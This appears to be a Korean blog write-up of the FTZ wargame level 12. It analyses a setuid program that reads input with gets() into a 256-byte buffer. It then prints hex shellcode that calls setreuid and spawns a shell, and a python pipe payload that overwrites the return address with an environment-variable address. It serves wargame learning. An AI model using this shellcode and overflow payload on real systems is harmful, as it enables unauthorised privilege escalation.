BOF/ ftz-level12

 

FTZ란 Free Training Zone의 약자로 hackerschool에서 배포하는 워게임입니다.
총 20문제로 구성되어 있으며 각 문제를 격파하여 다음 레벨의 패스워드를 얻는 형식입니다.
문제를 격파하고 다음 레벨의 bash를 획득하였다면 my-pass로 패스워드를 확인할 수 있습니다.

사용 linux 명령어
ls - 파일 내역 출력 cat - 파일 내용 확인
gcc - gcc컴파일러로 컴파일하도록 하는 명령 vim - text editor
cp - 파일 또는 디렉터리 복사 명령
export - 환경변수 등록 명령
getenv - 환경변수를 모두 보는 명령
gdb - 디버깅 도구

send me email if you have any questions.


FTZ Level 12

ID : level12
PASSWD : it is like this


1
2
3
4
5
6
7
8
9
10
11
12
13
14
  
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main( void )
{
        char str[256];

        setreuid( 3093, 3093 );
        printf( "문장을 입력하세요.\n" );
        gets( str );
        printf( "%s\n", str );
}


level11부터는 attackme라는 파일이 존재하며 hint는 attackme의 소스가 제공된다.

소스분석
gets로 문자열을 입력받아 str에 저장하고 str을 출력하는 소스.
gets함수는 입력받을 데이터의 크기제한이 없기 때문에 입력 데이터가 256Byte보다 크다면 buffer-overflow가 발생하는 취약점이 있다.
level13의 권한으로 set-uid가 설정되어 있다.

level11부터는 쉘코드를 사용하여 공격을 한다.
what is shellcode? - 주로 기계어 코드로 이루어진 소프트웨어 취약점을 공격하기 위한 코드.

level11에서 사용한 쉘코드

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80
이 쉘코드는 /bin/bash를 실행시키도록 하는 코드이다.

ftz에는 ASLR(메모리 보호기법)이 걸려있다.

ASLR은 프로그램을 실행할 때 마다 메모리 주소가 변경되는 메모리 보호기법


그림1
권한문제가 없도록 tmp디렉터리에 attackme를 복사하고 attackme의 메모리 구조를 파악하기 위해 gdb를 사용하여 intel방식으로 디스어셈블 한다.

어셈블리 분석
main+3 line을 보면 264byte의 공간을 메모리에 할당했을을 알 수 있다.
main+49 line을 보면 str의 주소는 ebp-264이며 str(256Byte)뒤에 8Byte의 dummy값이 있음을 알 수 있다.

메모리구조
str(256Byte)
dummy(8Byte)
sfp(4Byte)
ret(4Byte)


그림2
쉘코드를 환경변수에 등록하고 환경변수의 주소를 ret에 덮는 방식으로 공격을 시도.


그림3
환경변수의 주소를 얻기 위해 getenv명령을 통해 환경변수의 주소를 출력하는 소스를 작성한다.


그림4
소스파일을 컴파일하고 실행하여 환경변수의 주소를 얻는다.


그림5
ret에 접근하기 위해 ret전까지는 아무 값이나 채우고 ret에 환경변수의 주소를 little-endian방식으로 넣는다.
level11과는 달리 인자 형태가 아닌 gets로 프로그램 실행중에 입력을 받기 때문에 페이로드를 다른 방식으로 작성한다.
|(PIPE)를 이용하여 python으로 출력하는 페이로드를 attackme에 전달한다.


페이로드

(python -c “print ‘a’*268 + ‘\x2a\xfc\xff\xbf’” ;cat) | ./attackme